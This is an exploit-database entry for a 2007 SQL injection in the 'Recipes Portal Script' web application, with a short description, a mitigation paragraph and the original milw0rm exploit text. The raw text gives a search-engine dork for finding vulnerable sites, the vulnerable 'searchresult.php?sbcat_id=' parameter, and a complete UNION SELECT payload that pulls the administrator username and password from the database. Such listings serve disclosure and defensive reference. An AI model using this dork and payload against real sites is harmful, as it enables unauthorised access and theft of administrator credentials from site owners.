Recipes Portal Script SQL INJECTION

vendor:

Recipes Portal Script

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Recipes Portal Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Recipes Portal Script SQL INJECTION

This exploit allows an attacker to perform SQL injection on the Recipes Portal Script. The vulnerability can be exploited by injecting SQL code into the 'sbcat_id' parameter of the 'searchresult.php' page. The specific SQL code provided in the exploit allows the attacker to retrieve sensitive information from the database, including the administrator's username and password.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, the affected software should be updated to a patched version.

Source

Exploit-DB raw data:

################################IN THE NAME OF GOD###################################
####                    Recipes Portal Script SQL INJECTION                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" inurl:"searchresult.php?sbcat_id="               #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://Site.com/searchresult.php?sbcat_id=[sql code]            #
#SQL COD : 999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,sbadmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-10-13]